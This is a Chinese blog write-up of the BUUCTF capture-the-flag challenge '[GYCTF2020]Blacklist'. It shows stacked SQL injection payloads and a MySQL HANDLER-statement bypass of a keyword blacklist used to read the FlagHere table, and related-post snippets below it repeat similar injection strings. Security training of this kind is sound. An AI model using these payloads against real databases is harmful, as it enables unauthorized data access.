[GYCTF2020]Blacklist1-BUUCTF-详解

于 2024-02-05 15:01:15 发布
阅读量1.7k 收藏 33
点赞数 33
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chinese_cabbage0/article/details/136041329
版权
本文描述了一次SQL注入攻击尝试,攻击者利用MySQL的HANDLER语句特性打开并操作名为FlagHere的表,以绕过过滤字符,最终成功获取flag。
摘要由CSDN通过智能技术生成

打开题目,有一个1直接点击提交看看,返回了一组数组

然后加上一个单引号在提交。出现了报错,说明存在sql注入猜测是堆叠注入

为了防止1的干涉,用2来进行但是只输入2是没有回应的

所以使用2';show databases;#  来查看所有的数据库

然后来输入2'; show tables;#来查看数据库的表

然后我们通过FlagHere表来查看列输入2';show columns from FlagHere;# 来查看列

到了这一步了,我觉得就可以直接查看flag了,但是我查询的时候却出现了过滤字符

命令为2';select flag from FlagHere ;#这里我没有用反引号,我做题看有一个大佬在FlagHere上加了反引号,代表整个FlagHere是一个表的意思,但是不加也是一样的效果

没有得到flag于是我们想到/**/可以绕过检查所以构造playload为2';s/**/elect flag from FlagHere;#但是结果啥都没有

然后查看网上的大佬还有这种方式

HANDLER ... OPEN语句打开一个表,使其可以使用后续HANDLER ... READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER ... CLOSE或会话终止之前不会关闭

  • HANDLER tbl_name OPEN [ [AS] alias]
     
    HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)
        [ WHERE where_condition ] [LIMIT ... ]
    HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }
        [ WHERE where_condition ] [LIMIT ... ]
    HANDLER tbl_name READ { FIRST | NEXT }
        [ WHERE where_condition ] [LIMIT ... ]
     
    HANDLER tbl_name CLOSE

  • 然后我们重新构造playload为0';HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;HANDLER FlagHere CLOSE;#

  • 0';HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;HANDLER FlagHere CLOSE;# 这段SQL代码片段看起来像是针对MySQL数据库的SQL注入攻击尝试,它利用了MySQL特定的句法特性(如HANDLER语句)来尝试获取或操作名为 FlagHere 的表的数据

  • HANDLER FlagHere OPEN:在MySQL中,HANDLER语句用于处理存储过程内部的表或临时表。这个命令会打开一个名为 FlagHere 的表以进行行级锁定和读取操作。

  • HANDLER FlagHere READ FIRST:紧接着,READ FIRST 指令尝试从已打开的 FlagHere 表中读取第一条记录。

  • HANDLER FlagHere CLOSE:最后,CLOSE 命令用于关闭先前通过 OPEN 语句打开的表句柄,释放相关资源。

  • ; 分号用于分隔不同的SQL命令。

  • # 在MySQL中通常表示注释符,用于注释掉该符号后面直到行尾的内容,但在这里可能是企图绕过某些安全检查。

  • 获取到flag解题成功

xing.yu.CTF
关注
  • 33
    点赞
  • 33
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Steem Blacklist Notifier-crx插件
04-01
《Steem Blacklist Notifier-crx插件详解》 在当今的互联网世界中,社交网络平台扮演着重要的角色,而Steem作为一个基于区块链技术的社交媒体平台,为用户提供了一个全新的交互方式。然而,如同任何社区一样,Steem...
DISCORD.JS-BlackList-UnBlackList:卸载清单DISCORD.JS BlackListUnBlackLis命令
02-18
:information: DISCORD.JS-BlackList-UnBlackLis 将清单中的内容输入到BlackList / UnBlackList命令中。 默西·德·莱塞尔 :star: (STAR)Si Vous L'avezutilisépour votre bot。 :laptop: 代码Voici评论进口商...
[GYCTF2020]Blacklist 1
m0_62879498的博客
04-28 2474
[GYCTF2020]Blacklist 1 在做本题的时候,我们发现过滤掉了很多的关键字 很多注入方法已经没有办法使用(联合查询 布尔盲注 updataxml的报错注入) 并且发现本关的注入方法为 单引号 只能使用 堆叠注入 来进行查询查寻 库名 表名 1';show databases-- q 库名:supersqli 在这里 因为没有禁用 extractvalue 所以在这里我们可以构造出 extractvalue 报错注入 来查询库名 1' and (extractvalue(1,c
buuctf-web-[GYCTF2020]Blacklist1
mlws1900的博客
08-11 360
MySQL 除了可以使用 select 查询表中的数据,也可使用 handler 语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler 语句并不具备 select 语句的所有功能。它是 MySQL 专用的语句,并没有包含到SQL标准中。words表里有两个属性,即两列:id 和data,而FlagHere表里只有一个属性列,说明输入框可能查询的就是words表。换句话说我们没有办法像之前那样将 flaghere这个表改名为words(之前做过一题类似的)OPEN语句打开一个表。...
blacklist script-开源
05-03
制作黑名单系统iptables的简单脚本。 您可以创建黑名单并通过该程序对其进行管理。 请阅读自述文件以更好地了解此脚本。
Blacklist Whitelist-crx插件
03-21
保持计算机用户专注 Chrome上的黑名单或白名单网站。此扩展名对于Web Kiosks和其他受限制的计算机很有用。请注意,您可以通过使用同一用户登录多台计算机来限制多台计算机的设置-设置将传播到其他计算机。...
Blacklist Checker-crx插件
04-01
语言:English (United States) 此便捷工具可检查任何网站的黑名单和白名单。 快速检查您浏览到的任何网站并对其进行扫描,以查看它们是哪个BLACKLISTS和WHITELISTS。
web buuctf [GYCTF2020]Blacklist1
weixin_44214568的博客
03-18 1120
考点:堆叠注入;mysql查询语句handler 1.进行注入测试: 注入1' 提示语法错误; 注入1' or '1=1'# 返回表数据,有回显,存在字符型可注入漏洞; 2.联合查询:1' union select 1# 回显过滤 3.根据过滤事项,应该是堆叠查询 a.1'; show tables;# b.1';show columns from FlagHere;# 4.因为存在较多的过滤,利用Mysql数据库中的查询语法handler mysql除可使用se..
[GYCTF2020]Blacklist 1(详细做题过程)
lunan的博客
05-24 2133
[GYCTF2020]Blacklist 1(详细做题过程) 文章目录[GYCTF2020]Blacklist 1(详细做题过程)1、考点2、解题过程1、寻找`注入点`2、尝试`堆叠注入`3、尝试`联合注入`4、尝试`双写绕过`5、尝试`大小写绕过`6、传统方法行不通,看别人的wp中提到了`Handler`3、Handler语法 1、考点 1、堆叠注入 2、 Handler语法 心得:学会新的姿势Handler的sql查询方法 2、解题过程 1、寻找注入点 http://3c6e5317-cd37-4
[GYCTF2020]Blacklist1 wp
最新发布
qq_56301349的博客
11-26 76
MySQL 除了可以使用 select 查询表中的数据,也可使用 handler 语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler 语句并不具备 select 语句的所有功能。尝试进行联合注入获取列数和可以回显的信息,但是发现select被过滤,通过union select 测试得到过滤的关键字。首先,确定是否存在注入点,构造闭合的sql语句,payload:1' or '1'='1。本题中过滤了关键字select,因此我们只能通过handler来打开表,并读取数据。
buuctf-[GYCTF2020]Blacklist1(小宇特详解
小宇的web博客
02-09 1616
buuctf-[GYCTF2020]Blacklist1(小宇特详解) 1.先看题目是一道sql注入的题目 先尝试进行闭合 payload:1’ 这里可以试出来是'来进行闭合即可 2.然后尝试着进行联合查询 发现是进行了过滤。 3.这里尝试着进行堆叠注入 payload:1’;show tables;# 4.查表 payload:1’; show columns from FlagHere;# 这里屏蔽了许多东西 5.这里由于rename,和alter被过滤了,这里考虑利用HANDLER语句 这里
ROSE笔记-[GYCTF2020]Blacklist 1-WP
居上
11-13 339
[GYCTF2020]Blacklist 1 输入单引号,报错,sql注入. 1' or 1=1 order by 2#没有报错 1' or 1=1 order by 3#报错 先尝试联合查询 1' or 1=1 union select 1,2 发现过滤了大部分关键字 1' or 1=1;show databases;#查库 1' or 1=1;show tables;#查表 1' or 1=1;desc FlagHere;#查字段 HANDLER … OPEN语句打开一个表,使其可以使用后
[GYCTF2020]Blacklist
夜幕下的灯火阑珊的博客
05-12 886
知识点 堆叠注入 参考堆叠注入tips 查表名、列名、字段名 show databases; show tables; show columns from `table_name`; 本题使用HANDLER查看flag 1'; handler FlagHere open; handler FlagHere read first; handler FlagHere close;#
sudo: gedit/etc/modprobe.d/blacklist-nouveau.conf:找不到命令
06-13
这个问题看起来像是你在尝试编辑一个文件时输入了错误的命令。正确的命令应该是: ``` sudo gedit /etc/modprobe.d/blacklist-nouveau.conf ``` 请注意,命令和文件名之间有一个空格。这个命令会使用sudo权限打开gedit编辑器并打开blacklist-nouveau.conf文件以进行编辑。如果你仍然遇到问题,请提供更多的上下文信息,以便我可以更好地理解您的情况。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值